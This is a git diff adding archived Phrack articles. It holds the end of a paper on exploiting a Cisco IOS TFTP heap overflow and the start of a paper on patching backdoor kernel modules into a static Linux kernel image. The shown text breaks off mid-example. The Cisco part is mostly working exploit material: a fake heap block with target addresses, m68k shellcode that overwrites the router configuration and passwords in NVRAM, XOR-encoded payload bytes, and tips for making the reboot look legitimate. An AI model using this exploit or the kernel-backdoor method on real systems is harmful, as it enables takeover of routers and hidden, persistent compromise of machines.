+simple case is when the host block is the next-to-last block. And viola,
+this is the case with the TFTP server overflow. In other cases, the attack
+involves creating more than one fake block header and becomes increasingly
+complicated but not impossible. But from this point on, the discussion is
+pretty much centered around the specific bug we are dealing with.
+
+Assumed normal operation, IOS will allocate some block for storing the
+requested file name. The block after that is the remaining free memory.
+When IOS is done with the TFTP operation, it will free() the block it just
+allocated. Then, it will find out that there are two free blocks - one
+after the other - in memory. To prevent memory fragmentation (a big problem
+on heavy load routers), IOS will try to coalesce (merge) the free blocks
+into one. By doing so, the pointers for the linked lists have to be
+adjusted. The NEXT and PREV pointers of the block before that and the block
+after that (the remaining free memory) have to be adjusted to point to each
+other. Additionally, the pointers in the free block info FREE NEXT and FREE
+PREV have to be adjusted, so the linked list of free blocks is not broken.
+
+Out of the sudden, we have two pointer exchange operations that could
+really help us. Now, we know that we can not choose the pointer in PREV.
+Although, we can choose the pointer in NEXT, assumed that "Check heaps"
+does not fire before our free() tok place, this only allowes us to write
+the previous pointer to any writable location in the routers memory. Being
+usefull by itself, we will not look deeper into this but go on to the FREE
+NEXT and FREE PREV pointers. As the focused reader surely noticed, these
+two pointers are not validated by "Check heaps".
+
+What makes exploitation of this situation extremely convenient is that
+fact, that the pointer exchange in FREE PREV and FREE NEXT only relies on
+the values in those two fields. What happens during the merge operation is
+this:
+	+ the value in FREE PREV is written to where FREE NEXT points to
+	  plus an offset of 20 bytes
+	+ the value in FREE NEXT is written to where FREE PREV points to
+
+The only thing we need now is a place to write a pointer to. As with many
+other pointer based exploits, we are looking for a fairly static location
+in memory to do this. Such a static location (changes per IOS image) is the
+process stack of standard processes loaded right after startup. But how do
+we find it?
+
+In the IOS memory list, there is an element called the "Process Array".
+This is a list of pointers - one for every process currently running in
+IOS. You can find it's location by issuing a "show memory processor
+allocating-process" command (output trimmed):
+
+radio#show memory processor allocating-process
+
+          Processor memory
+
+ Address Bytes Prev.   Next    Ref  Alloc Proc Alloc PC  What
+258AD20   1504 0       258B32C   1  *Init*     20D62F0   List Elements
+258B32C   3004 258AD20 258BF14   1  *Init*     20D6316   List
+...
+258F998   1032 258F914 258FDCC   1  *Init*     20E5108   Process Array
+258FDCC   1000 258F998 25901E0   1  Load Meter 20E54BA   Process Stack
+25901E0    488 258FDCC 25903F4   1  Load Meter 20E54CC   Process
+25903F4    128 25901E0 25904A0   1  Load Meter 20DD1CE   Process Events
+
+This "Process Array" can be displayed by the "show memory" command:
+
+radio#show memory 0x258F998
+0258F990:                   AB1234CD FFFFFFFE          +.4M...~
+0258F9A0: 00000000 020E50B6 020E5108 0258FDCC  ......P6..Q..X}L
+0258F9B0: 0258F928 80000206 00000001 020E1778  .Xy(...........x
+0258F9C0: 00000000 00000028 02590208 025D74C0  .......(.Y...]t@
+0258F9D0: 02596F3C 02598208 025A0A04 025A2F34  .Yo<.Y...Z...Z/4
+0258F9E0: 025AC1FC 025BD554 025BE920 025BFD2C  .ZA|.[UT.[i .[},
+0258F9F0: 025E6FF0 025E949C 025EA95C 025EC484  .^op.^...^)\.^D.
+0258FA00: 025EF404 0262F628 026310DC 02632FD8  .^t..bv(.c.\.c/X
+0258FA10: 02634350 02635634 0263F7A8 026418C0  .cCP.cV4.cw(.d.@
+0258FA20: 026435FC 026475E0 025D7A38 026507E8  .d5|.du`.]z8.e.h
+0258FA30: 026527DC 02652AF4 02657200 02657518  .e'\.e*t.er..eu.
+0258FA40: 02657830 02657B48 02657E60 0269DCFC  .ex0.e{H.e~`.i\|
+0258FA50: 0269EFE0 026A02C4 025DD870 00000000  .io`.j.D.]Xp....
+0258FA60: 00000000 025C3358 026695EC 0266A370  .....\3X.f.l.f#p
+
+While you also see the already discussed block header format in action now,
+the interesting information starts at 0x0258F9C4. Here, you find the number
+of processes currently running on IOS. They are ordered by their process
+ID. What we are looking for is a process that gets executed every once in a
+while. The reason for this is, if we modify something in the process data
+structures, we don't want the process being active at this point in time,
+so that the location we are overwriting is static. For this reason, yours
+truly picked the "Load Meter" process, which is there to measure the system
+load and is fired off about every 30 seconds. Let's get the PID of
+"Load Meter":
+
+radio#show processes cpu
+CPU utilization for five seconds: 2%/0%; one minute: 3%; five minutes: 3%
+ PID  Runtime(ms)  Invoked  uSecs    5Sec   1Min   5Min TTY Process
+   1          80      1765     45   0.00%  0.00%  0.00%   0 Load Meter
+
+Well, conveniently, this process has PID 1. Now, we check the memory
+location the "Process Array" points to. Yours truly calls this memory
+location "process record", since it seems to contain everything IOS needs
+to know about the process. The first two entries in the record are:
+
+radio#sh mem 0x02590208
+02590200:                   0258FDF4 025901AC          .X}t.Y.,
+02590210: 00001388 020E488E 00000000 00000000  ......H.........
+02590220: 00000000 00000000 00000000 00000000  ................
+
+The first entry in this record is 0x0258FDF4, which is the process stack.
+You can compare this to the line above that says "Load Meter" and "Process
+Stack" on it in the output of "show memory processor allocating-process".
+The second element is the current stack pointer of this process
+(0x025901AC). By now it should also be clear why we want to pick a process
+with low activity. But surprisingly, the same procedure also works quite
+well with busier processes such as "IP Input". Inspecting the location of
+the stack pointer, we see something quite familiar:
+
+radio#sh mem 0x025901AC
+025901A0:                            025901C4              .Y.D
+025901B0: 020DC478 0256CAF8 025902DE 00000000  ..Dx.VJx.Y.^....
+
+This is classic C calling convention: first we find the former frame
+pointer and then we find the return address. Therefore, 0x025901B0 is the
+address we are targeting to overwrite with a pointer supplied by us.
+
+The only question left is: Where do we want the return address to point to?
+As already mentioned, IOS will overwrite the buffer we are filling with
+0x0D0D0D0D when the free() is executed - so this is not a good place to
+have your code in. On the other hand, the fake block's data section is
+already considered clean from IOS's point of view, so we just append our
+code to the fake block header we already have to send. But what's the
+address of this? Well, since we have to know the previous pointer, we can
+calculate the address of our code as offset to this one - and it turns out
+that this is actually a static number in this case. There are other, more
+advanced methods to deliver the code to the device, but let's keep focused.
+
+The TFTP filename we are asking for should now have the form of:
+
+ +--------------+
+ | AAAAAAAAAAAA |
+ ...
+ | AAAAAAAAAAAA |
+ +--------------+
+ | FAKE BLOCK   |
+ |              |
+ ....
+ |              |
+ +--------------+
+ | CODE         |
+ |              |
+ ....
+ +--------------+
+
+At this point, we can build the fake block using all the information we
+gathered:
+
+    char                fakeblock[] =
+        "\xFD\x01\x10\xDF"      // RED
+        "\xAB\x12\x34\xCD"      // MAGIC
+        "\xFF\xFF\xFF\xFF"      // PID
+        "\x80\x81\x82\x83"      //
+        "\x08\x0C\xBB\x76"      // NAME
+        "\x80\x8a\x8b\x8c"      //
+
+        "\x02\x0F\x2A\x04"      // NEXT
+        "\x02\x0F\x16\x94"      // PREV
+
+        "\x7F\xFF\xFF\xFF"      // SIZE
+        "\x01\x01\x01\x01"      //
+        "\xA0\xA0\xA0\xA0"      // padding
+        "\xDE\xAD\xBE\xEF"      // MAGIC2
+        "\x8A\x8B\x8C\x8D"      //
+        "\xFF\xFF\xFF\xFF"      // padding
+        "\xFF\xFF\xFF\xFF"      // padding
+
+        "\x02\x0F\x2A\x24"      // FREE NEXT (in BUFFER)
+        "\x02\x59\x01\xB0"      // FREE PREV (Load Meter return addr)
+        ;
+
+When sending this to the Cisco, you are likely to see something like this:
+
+*** EXCEPTION ***
+illegal instruction interrupt
+program counter = 0x20f2a24
+status register = 0x2700
+vbr at time of exception = 0x4000000
+
+depending on what comes after your fake block header. Of course, we did not
+provide code for execution yet. But at this point in time, we got the CPU
+redirected into our buffer.
+
+--[ 5 - Writing (shell)code for Cisco
+
+Before one can write code for the Cisco platform, you have to decide on the
+general processor architecture you are attacking. For the purpose of this
+paper, we will focus on the lower range devices running on Motorola 68k
+CPUs.
+
+Now the question is, what do you want to do with your code on the system.
+Classic shell code design for commonly used operating system platforms uses
+syscalls or library functions to perform some port binding and provide
+shell access to the attacker. The problem with Cisco IOS is, that we will
+have a hard time keeping it alive after we performed our pointer games.
+This is because in contrast to "normal" daemons, we destroyed the memory
+management of the operating system core and we can not expect it to cope
+with the mess we left for it.
+
+Additionally, the design of IOS does not feature transparent syscalls as
+far as yours truly knows. Because of it's monolithic design, things are
+linked together at build time. There might be ways to call different
+subfunctions of IOS even after an heap overflow attack, but it appears to
+be an inefficient route to take for exploitation and would make the whole
+process even more instable.
+
+The other way is to change the routers configuration and reboot it, so it
+will come up with the new config, which you provided. This is far more
+simpler than trying to figure out syscalls or call stack setups. The idea
+behind this approach is, that you don't need any IOS functionality anymore.
+Because of this, you don't have to figure out addresses and other vital
+information about the IOS. All you have to know is which NVRAM chips are
+used in the box and where there are mapped. This might sound way more
+complicated than identifying functions in an IOS image - but is not. In
+contrast to common operating systems on PC platforms, where the number of
+possible hardware combinations and memory mappings by far exceedes a
+feasable mapping range, it's the other way around for Cisco routers. You
+can have more than ten different IOS images on a single platform - and this
+is only one branch - but you always have the same general memory layout and
+the ICs don't change for the most part. The only thing that may differ
+between two boxes are the modules and the size of available memory (RAM,
+NVRAM and Flash), but this is not of big concern for us.
+
+The non-volatile random access memory (NVRAM) stores the configuration of a
+Cisco router in most cases. The configuration itself is stored in plain
+text as one continious C-style string or text file and is terminated by the
+keyword 'end' and one or more 0x00 bytes. A header structure contains
+information like the IOS version that created this configuration, the size
+of it and a checksum. If we replace the config on the NVRAM with our own
+and calculate the numbers for the header structure correctly, the router
+will use our IP addresses, routings, access lists and (most important)
+passwords next time it reloads.
+
+As one can see on the memory maps [2], there are one (in the worst case
+two) possible memory addresses for the NVRAM for each platform. Since
+the NVRAM is mapped into the memory just like most memory chips are, we
+can access it with simple memory move operations. Therefore, the only thing
+we need for our "shell" code is the CPU (M68k), it's address and data bus
+and the cooperation of the NVRAM chip.
+
+There are things to keep in mind about NVRAM. First of all, it's slow to
+write to. The Xicor chips yours truly encountered on Cisco routers require
+that after a write, the address lines are kept unchanged for the time the
+chip needs to write the data. A control register will signal when the write
+operation is done. Since the location of this control register is not known
+and might not be the same for different types of the same platform, yours
+truly prefers to use delay loops to give the chip time to write the data -
+since speed is not the attackers problem here.
+
+Now, that we know pretty much what we want to do, we can go on and look at
+the "how" part of things. First of all, you need to produce assembly for
+the target platform. A little known fact is, that IOS is actually build (at
+least some times) using GNU compilers. Therefore, the binutils[3] package
+can be compiled to build Cisco compatible code by setting the target
+platform for the ./configure run to --target=m68k-aout. When you are done,
+you will have a m68k-aout-as binary, which can produce your code and a
+m68k-aout-objdump to get the OP code values.
+
+In case the reader is fluent in Motorola 68000 assembly, I would like to
+apologize for the bad style, but yours truly grew up on Intel.
+Optimizations and style guides are welcome. Anyway, let's start coding.
+
+For a string overflow scenario like this one, the recommended way for small
+code is to use self-modification. The main code will be XOR'd with a
+pattern like 0x55 or 0xD5 to make sure that no 0x00 bytes show up. A
+bootstrap code will decode the main code and pass execution on to it. The
+Cisco 1600 platform with it's 68360 does not have any caching issues to
+worry us (thanks to LSD for pointing this out), so the only issue we have
+is avoiding 0x00 bytes in the bootstrap code. Here is how it works:
+
+--- bootstrap.s ---
+	.globl _start
+_start:
+        | Remove write protection for NVRAM.
+	| Protection is Bit 1 in BR7 for 0x0E000000
+        move.l  #0x0FF010C2,%a1
+        lsr     (%a1)
+
+        | fix the brance opcode
+	| 'bne decode_loop' is OP code 0x6600 and this is bad
+        lea     broken_branch+0x101(%pc),%a3
+        sub.a   #0x0101,%a3
+        lsr     (%a3)
+
+        | perform dummy load, where 0x01010101 is then replaced
+        | by our stack ptr value due to the other side of the pointer
+	| exchange
+        move.l  #0x01010101,%d1
+
+        | get address of the real code appended plus 0x0101 to
+	| prevent 0x00 bytes
+        lea     xor_code+0x0101(%pc),%a2
+        sub.a   #0x0101,%a2
+        | prepare the decode register (XOR pattern)
+        move.w  #0xD5D5,%d1
+
+decode_loop:
+	| Decode our main payload code and the config
+        eor.w   %d1,(%a2)+
+	| check for the termination flag (greetings to Bine)
+        cmpi.l  #0xCAFEF00D,(%a2)
+broken_branch:
+        | this used to be 'bne decode_loop' or 0x6600FFF6
+        .byte   0xCC,0x01,0xFF,0xF6
+
+xor_code:
+
+--- end bootstrap.s ---
+
+You may assemble the code into an object file using:
+linux# m68k-aout-as -m68360 -pic --pcrel -o bootstrap.o bootstrap.s
+
+There are a few things to say about the code. Number one are the first two
+instructions. The CPU we are dealing with supports write protection for
+memory segments [4]. Information about the memory segments is stored in
+so-called "Base Registers", BR0 to BR7. These are mapped into memory at
+0x0FF00000 and later. The one we are interested in (BR7) is at 0x0FF010C2.
+Bit0 tells the CPU if this memory is valid and Bit1 if it's write
+protected, so the only thing we need to do is to shift the lower byte one
+Bit to the right. The write protection Bit is cleared and the valid Bit is
+still in place.
+
+The second thing of mild interest is the broken branch code, but the
+explaination in the source should make this clear: the OP code of "BNE"
+unfortunately is 0x6600. So we shift the whole first word one to the right
+and when the code runs, this is corrected.
+
+The third thing is the dummy move to d1. If the reader would refer back to
+the place we discussed the pointer exchange, he will notice that there is a
+"back" part in this operation: namely the stack address is written to our
+code plus 20 bytes (or 0x14). So we use a move operation that translates to
+the OP code of 0x223c01010101, located at offset 0x12 in our code. After
+the pointer exchange takes place, the 0x01010101 part is replaced by the
+pointer - which is then innocently moved to the d1 register and ignored.
+
+When this code completed execution, the appended XOR'd code and config
+should be in memory in all clear text/code. The only thing we have to do
+now is copy the config in the NVRAM. Here is the appropriate code to do
+this:
+
+--- config_copy.s ---
+        .globl  _start
+_start:
+
+	| turn off interrupts
+        move.w	#0x2700,%sr;
+	move.l	#0x0FF010C2,%a1
+	move.w	#0x0001,(%a1)
+
+	| Get position of appended config and write it with delay
+	lea	config(%pc),%a2
+	move.l	#0x0E0002AE,%a1
+	move.l	#0x00000001,%d2
+
+copy_confg:
+	move.b	(%a2)+,(%a1)+
+	| delay loop
+	move.l	#0x0000FFFF,%d1
+  write_delay:
+	  subx	%d2,%d1
+	  bmi	write_delay
+	cmp.l	#0xCAFEF00D,(%a2)
+	bne	copy_confg
+
+	| delete old config to prevent checksum errors
+delete_confg:
+	move.w	#0x0000,(%a1)+
+	move.l	#0x0000FFFF,%d1
+	| delay loop
+  write_delay2:
+	  subx	%d2,%d1
+	  bmi	write_delay2
+	cmp.l	#0x0E002000,%a1
+	blt	delete_confg
+
+	|  perform HARD RESET
+CPUReset:
+        move.w	#0x2700,%sr
+        moveal	#0x0FF00000,%a0
+        moveal	(%a0),%sp
+        moveal	#0x0FF00004,%a0
+        moveal	(%a0),%a0
+        jmp	(%a0)
+
+config:
+--- end config_copy.s ---
+
+There is no particular magic about this part of the code. The only thing
+worth noticing is the final CPU reset. There is reason why we do this. If
+we just crash the router, there might be exception handlers in place to
+save the call stack and other stuff to the NVRAM. This might change
+checksums in an unpredictable way and we don't want to do this. The other
+reason is, that a clean reset makes the router look like it was rebooted by
+an administrator using the "reload" command. So we don't raise any
+questions despite the completely changed configuration ;-)
+
+The config_copy code and the config itself must now be XOR encoded with the
+pattern we used in the bootstrap code. Also, you may want to put the code
+into a nice char array for easy use in a C program. For this, yours truly
+uses a dead simple but efficient Perl script:
+
+--- objdump2c.pl ---
+#!/usr/bin/perl
+
+$pattern=hex(shift);
+$addressline=hex(shift);
+
+while (<STDIN>) {
+    chomp;
+    if (/[0-9a-f]+:\t/) {
+	(undef,$hexcode,$mnemonic)=split(/\t/,$_);
+	$hexcode=~s/ //g;
+	$hexcode=~s/([0-9a-f]{2})/$1 /g;
+
+	$alc=sprintf("%08X",$addressline);
+	$addressline=$addressline+(length($hexcode)/3);
+
+	@bytes=split(/ /,$hexcode);
+	$tabnum=4-(length($hexcode)/8);
+	$tabs="\t"x$tabnum;
+	$hexcode="";
+	foreach (@bytes) {
+		$_=hex($_);
+		$_=$_^$pattern if($pattern);
+		$hexcode.=sprintf("\\x%02X",$_);
+	}
+	print "\t\"".$hexcode."\"".$tabs."//".$mnemonic." (0x".$alc.")\n";
+    }
+}
+--- end objdump2c.pl ---
+
+You can use the output of objdump and pipe it into the script. If the
+script got no parameter, it will produce the C char string without
+modifications. The first optional paramter will be your XOR pattern and the
+second one can be the address your buffer is going to reside at. This makes
+debugging the code a hell of a lot easier, because you can refer to the
+comment at the end of your C char string to find out which command made the
+Cisco unhappy.
+
+The output for our little config_copy.s code XOR'd with 0xD5 looks like
+this (trimmed for phrack):
+
+linux# m68k-aout-objdump -d config_copy.o |
+> ./objdump2XORhex.pl 0xD5 0x020F2A24
+
+"\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A24)
+"\xF7\xA9\xDA\x25\xC5\x17"      //moveal #267391170,%a1 (0x020F2A28)
+"\xE7\x69\xD5\xD4"              //movew #1,%a1@ (0x020F2A2E)
+"\x90\x2F\xD5\x87"              //lea %pc@(62 <config>),%a2 (0x020F2A32)
+"\xF7\xA9\xDB\xD5\xD7\x7B"      //moveal #234881710,%a1 (0x020F2A36)
+"\xA1\xD4"                      //moveq #1,%d2 (0x020F2A3C)
+"\xC7\x0F"                      //moveb %a2@+,%a1@+ (0x020F2A3E)
+"\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A40)
+"\x46\x97"                      //subxw %d2,%d1 (0x020F2A46)
+"\xBE\xD5\x2A\x29"              //bmiw 22 <write_delay> (0x020F2A48)
+"\xD9\x47\x1F\x2B\x25\xD8"      //cmpil #-889262067,%a2@ (0x020F2A4C)
+"\xB3\xD5\x2A\x3F"              //bnew 1a <copy_confg> (0x020F2A52)
+"\xE7\x29\xD5\xD5"              //movew #0,%a1@+ (0x020F2A56)
+"\xF7\xE9\xD5\xD5\x2A\x2A"      //movel #65535,%d1 (0x020F2A5A)
+"\x46\x97"                      //subxw %d2,%d1 (0x020F2A60)
+"\xBE\xD5\x2A\x29"              //bmiw 3c <write_delay2> (0x020F2A62)
+"\x66\x29\xDB\xD5\xF5\xD5"      //cmpal #234889216,%a1 (0x020F2A66)
+"\xB8\xD5\x2A\x3D"              //bltw 32 <delete_confg> (0x020F2A6C)
+"\x93\x29\xF2\xD5"              //movew #9984,%sr (0x020F2A70)
+"\xF5\xA9\xDA\x25\xD5\xD5"      //moveal #267386880,%a0 (0x020F2A74)
+"\xFB\x85"                      //moveal %a0@,%sp (0x020F2A7A)
+"\xF5\xA9\xDA\x25\xD5\xD1"      //moveal #267386884,%a0 (0x020F2A7C)
+"\xF5\x85"                      //moveal %a0@,%a0 (0x020F2A82)
+"\x9B\x05"                      //jmp %a0@ (0x020F2A84)
+
+Finally, there is only one more thing to do before we can compile this all
+together: new have to create the new NVRAM header and calculate the
+checksum for our new config. The NVRAM header has the form of:
+
+typedef struct {
+    u_int16_t       magic;  	// 0xABCD
+    u_int16_t       one;	// Probably type (1=ACII, 2=gz)
+    u_int16_t       checksum;
+    u_int16_t       IOSver;
+    u_int32_t       unknown;	// 0x00000014
+    u_int32_t       cfg_end;	// pointer to first free byte in
+				// memory after config
+    u_int32_t       size;
+} nvhdr_t;
+
+Obviously, most values in here are self-explainory. This header is not
+nearly as much tested as the memory structures, so IOS will forgive you
+strange values in the cfg_end entry and such. You can choose the IOS
+version, but yours truly recommends to use something along the lines of
+0x0B03 (11.3), just to make sure it works. The size field covers only the
+real config text - not the header.
+The checksum is calculated over the whole thing (header plus config) with
+the checksum field itself being set to zero. This is a standard one's
+complement checksum as you find in any IP implementation.
+
+When putting it all together, you should have something along the lines of:
+
+ +--------------+
+ | AAAAAAAAAAAA |
+ ...
+ | AAAAAAAAAAAA |
+ +--------------+
+ | FAKE BLOCK   |
+ |              |
+ ....
+ +--------------+
+ | Bootstrap    |
+ |              |
+ ....
+ +--------------+
+ | config_copy  |
+ |   XOR pat    |
+ ....
+ +--------------+
+ | NVRAM header |
+ | + config     |
+ |   XOR pat    |
+ ....
+ +--------------+
+
+...which you can now send to the Cisco router for execution. If everything
+works the way it is planned, the router will seemingly freeze for some
+time, because it's working the slow loops for NVRAM copy and does not allow
+interrupts, and should then reboot clean and nice.
+
+To save space for better papers, the full code is not included here but is
+available at http://www.phenoelit.de/ultimaratio/UltimaRatioVegas.c . It
+supports some adjustments for code offset, NOPs where needed and a slightly
+different fake block for 11.1 series IOS.
+
+--[ 6 - Everything not covered in 1-5
+
+A few assorted remarks that somehow did not fit into the rest of this text
+should be made, so they are made here.
+
+First of all, if you find or know an overflow vulnerability for IOS 11.x
+and you think that it is not worth all the trouble to exploit since
+everyone should run 12.x by now, let me challange this. Nobody with some
+experience on Cisco IOS will run the latest version. It just doesn't work
+correctly. Additionally, many people don't update their routers anyway. But
+the most interesting part is a thing called "Helper Image" or simply "boot
+IOS". This is a mini-IOS loaded right after the ROM monitor, which is
+normally a 11.x. On the smaller routers, it's a ROM image and can not be
+updated easily. For the bigger ones, people assured me that there are no
+12.x mini-IOSes out there they would put on a major production router. Now,
+when the Cisco boot up and starts the mini-IOS, it will read the config and
+work accordingly as long as the feature is supported. Many are - including
+the TFTP server. This gives an attacker a 3-8 seconds time window in which
+he can perform an overflow on the IOS, in case somone reloads the router.
+In case this goes wrong, the full-blown IOS still starts up, so there will
+be no traces of any hostile activity.
+
+The second item yours truly would like to point out are the different
+things one might want to explore for overflow attacks. The obvious one
+(used in this paper as example) is a service running on a Cisco router.
+Another point for overflowing stuff are protocols. No protocol inspection
+engine is perfect AFAYTK. So even if the IOS is just supposed to route
+the packet, but has to inspect the contents for some reason, you might find
+something there. And if all fails, there are still the debug based
+overflows. IOS offers a waste amount of debug commands for next to
+everything. These do normally display a lot of information comming right
+from the packet they received and don't always check the buffer they use
+for compiling the displayed string. Unfortunately, it requires someone to
+turn on debugging in the first place - but well, this might happen.
+
+And finally, some greets have to be in here. Those go to the following
+people in no particular order: Gaus of Cisco PSIRT, Nico of Securite.org,
+Dan of DoxPara.com, Halvar Flake, the three anonymous CCIEs/Cisco wizards
+yours truly keeps asking strange questions and of course FtR and Mr. V.H.,
+because without their equipment, there wouldn't be any research to speak
+of. Additional greets go to all people who research Cisco stuff and to whom
+yours truly had no chance to talk to so far - please get in touch with us.
+The last one goes to the vulnerability research labs out there: let me
+know if you need any help reproducing this `;-7
+
+--[ A - References
+
+[1] anonymous <d45a312a@author.phrack.org>
+    "Once upon a free()..."
+    Phrack Magazine, Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12
+
+[2] Cisco Router IOS Memory Maps
+    http://www.cisco.com/warp/public/112/appB.html
+
+[3] GNU binutils
+    http://www.gnu.org/software/binutils/binutils.html
+
+[4] Motorola QUICC 68360 CPU Manual
+    MC68360UM, Page 6-70
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/8.txt b/phrack60/8.txt
new file mode 100644
index 0000000..d2f0a4f
--- /dev/null
+++ b/phrack60/8.txt
@@ -0,0 +1,2517 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x08 of 0x10
+
+|=-------------------=[ Static Kernel Patching ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ jbtzhm <jbtzhm@nsfocus.com> ]=---------------------=|
+|=---------------------[ http://www.nsfocus.com ]=-----------------------=|
+
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Get kernel from the image
+
+  3 - Allocate some space in image
+
+  4 - Relocate the symbol in module file
+
+  5 - Make it autorun when reboot
+
+  6 - Possible solutions
+
+  7 - Conclusion
+
+  8 - References
+
+  9 - Appendix: The implementation
+
+
+--[ 1 - Introduction
+
+This paper will show a simple way to patch a common LKM into the
+static linux kernel image.Most kernel backdoors are implemented by loadable
+kernel module which is loaded into kernel by insmod or /dev/kmem,and the 
+backdoor module can found easily if the disk can be mounted on other 
+machines.It is not the expected result.What is wanted is just to find a
+method to put the LKM into kernel image,and make it run when reboot.
+
+The program attached in the appendix contains codes and debugs in redhat7.2
+(Intel)default installation,and can be easily tested on other kernel 
+versions by some modification.Also the program is based on the 
+/boot/System.map file which contains the kernel symbol address.If the file
+doesn't exist on your system,more works have to be done to make it run.
+
+--[ 2 - Get kernel from the image
+
+The first step is getting kernel from image file that is usually compressed
+(uncompress image is not concerned because it is much easier).The image
+file can be analyzed from the kernel source files,and Makefile will
+clarify the structure of the image.
+
+[/usr/src/linux/arch/i386/boot/Makefile]
+
+..
+zImage: $(CONFIGURE) bootsect setup compressed/vmlinux tools/build
+        $(OBJCOPY) compressed/vmlinux compressed/vmlinux.out
+        tools/build bootsect setup compressed/vmlinux.out $(ROOT_DEV) >
+zImage
+..
+(bzImage is similar)
+
+bootsect: bootsect.o
+        $(LD) -Ttext 0x0 -s --oformat binary -o $@ $<
+
+bootsect.o: bootsect.s
+        $(AS) -o $@ $<
+
+bootsect.s: bootsect.S Makefile $(BOOT_INCL)
+        $(CPP) $(CPPFLAGS) -traditional $(SVGA_MODE) $(RAMDISK) \
+$< -o $@
+
+..
+setup: setup.o
+        $(LD) -Ttext 0x0 -s --oformat binary -e begtext -o $@ $<
+
+setup.o: setup.s
+        $(AS) -o $@ $<
+
+setup.s: setup.S video.S Makefile $(BOOT_INCL) $(TOPDIR)\
+/include/linux/version.h $(TOPDIR)/include/linux/compile.h
+        $(CPP) $(CPPFLAGS) -D__ASSEMBLY__ -traditional \
+$(SVGA_MODE) $(RAMDISK) $< -o $@
+
+The bootsect and setup file are easy to understand.They are created by
+bootsect.s and setup.s respectively.The vmlinux.out file is raw binary
+file generated by objcopy command.The value of $(OBJCOPY) is
+"objcopy -O binary -R .note -R .comment -S". More details are available
+by `man objcopy`.When the three files are ready the build program will
+bind the three files to on file which is the kernel image file.
+However the vmlinx file is generated more complicatedly.It is also possible
+to go into the compressed directory and look through the Makefile.
+
+[/usr/src/linux/arch/i386/boot/compressed/Makefile]
+..
+vmlinux: piggy.o $(OBJECTS)
+        $(LD) $(ZLINKFLAGS) -o vmlinux $(OBJECTS) piggy.o
+
+The $(OBJECTS) includes head.o and misc.o,compiled by head.S and
+misc.c respectively.The most important step in head.S is calling
+the decompress_kernel function in misc.c.The function will inflate
+the compressed kernel.When the decompress_kernel takes effect,it requires
+input_len and input_data symbol which are defined in piggy.o
+
+..
+piggy.o:        $(SYSTEM)
+        tmppiggy=_tmp_$$$$piggy; \
+        rm -f $$tmppiggy $$tmppiggy.gz $$tmppiggy.lnk; \
+        $(OBJCOPY) $(SYSTEM) $$tmppiggy; \
+        gzip -f -9 < $$tmppiggy > $$tmppiggy.gz; \
+        echo "SECTIONS { .data : { input_len = .; \
+        LONG(input_data_end - input_data) input_data = .; \
+        *(.data) input_data_end = .; }}" > $$tmppiggy.lnk;
+        $(LD) -r -o piggy.o -b binary $$tmppiggy.gz -b elf32-i386 -T \
+        $$tmppiggy.lnk;
+        rm -f $$tmppiggy $$tmppiggy.gz $$tmppiggy.lnk
+
+The piggy.o file is a common ELF object file.However,it only contains data
+section.The ld requires a command file like this\
+
+SECTIONS { .data : { input_len = .; LONG(input_data_end - input_data)\
+input_data = .; *(.data) input_data_end = .; }}
+
+The command file enables the piggy.o to have the symbol which is required 
+by misc.o.Hopefully the command "gzip -f -9" also can be seen. It just 
+compressed the kernel file compiled by thousands of kernel source files.
+
+So the kernel image could be described like this
+[bootsect][setup][[head][misc][compressed_kernel]]
+
+Now let us understand more about the boot process.
+The process can be separated into the following some logical stages:
+1.BIOS selects the boot device.
+2.BIOS loads the [bootsecto] from the boot device.
+3.[bootsect] loads [setup] and [[head][misc][compressed_kernel]].
+4.[setup] do sth. and jmp to [head](it is at 0x1000 or 0x100000).
+5.[head] call uncompressed_kernel in [misc].
+6.[misc] uncompressed [compressed_kernel] and put it at 0x100000.
+7.high level init(begin at startup_32 in linux/arch/i386/kernel/head.S).
+
+After the machine run into step 7,the high level initialization begins.
+
+When the structure of the kernel image is clear,kernel text from the 
+compressed image with a dirty method are easily available.It is matching
+the compress-magic contained in image.It is also known the 4-byte number
+before the magic is the input_data from which the offset can be verified.
+After this gunzip the kernel is pretty easy.
+
+
+--[ 3 - Allocate some space in image to use
+
+The allocation here doesn't mean vmalloc or kmalloc method.It just means
+space is required to contain the LKM file.The lkm file >> the kernel can
+be easily catted,but it will not work.To find the reason,the best method is
+to go back into the kernel initial code,which is all in step 7 mentioned 
+above.
+
+[/usr/src/linux/arch/i386/kernel/head.S]
+..
+/*
+ * Clear BSS first so that there are no surprises...
+ */
+ xorl %eax,%eax
+ movl $ SYMBOL_NAME(__bss_start),%edi
+ movl $ SYMBOL_NAME(_end),%ecx
+ subl %edi,%ecx
+ cld
+ rep
+ stosb
+..
+After reading the head.S file,the above code can be found,which clearly
+expressed that it will clarify BSS range.The BSS area contains the
+uninitialized variable which is not included in the kernel file,but the
+kernel memory will leave the area to bss.So the lkm will be clear if just 
+appending the code to the kernel.To solve the problem some dummy data
+can be added before the code the length of which is just equal to the bss
+size.Though it will make the new kernel much larger,the compressed will 
+help to deflate all the zero data effectively.
+
+However there is also another problem.Read through followed code
+
+[/usr/src/linux/arch/i386/kernel/setup.c]
+..
+void __init setup_arch(char **cmdline_p)---called by start_kernel
+..
+ init_mm.
+        /*
+         * partially used pages are not usable - thus
+         * we are rounding upwards:
+         */
+..
+        start_pfn = PFN_UP(__pa(&_end));start_code = (unsigned long) &_text;
+ init_mm.end_code = (unsigned long) &_etext;
+ init_mm.end_data = (unsigned long) &_edata;
+ init_mm.brk = (unsigned long) &_end;//it is bss end
+..
+
+The kernel wouldn't leave any space to the lkm unreasonable,so it will 
+manage the space available from the bss end which is just the beginning 
+of the LKM code.Therefore,the _end symbol in text should be modified to 
+give the start_pfn a larger value.Then the new kernel will be like this:
+
+[modified kernel][all zero dummy][module]
+
+--[ 4 - Relocate the symbol in module file
+
+The module is common LKM file and its type is usually ELF object file,and
+the object file need to be relocated before it could be used.The following
+example make it easier to understand.
+
+int init_module()
+{
+ char s[] = "hello world\n";
+ printk("%s\n",s);
+ return 0;
+}
+After compiling the program by command gcc,the module.o is available:
+
+[root@linux-jbtzhm test]#gcc -O2 -c module.c
+
+[root@linux-jbtzhm test]# objdump -x module.o|more
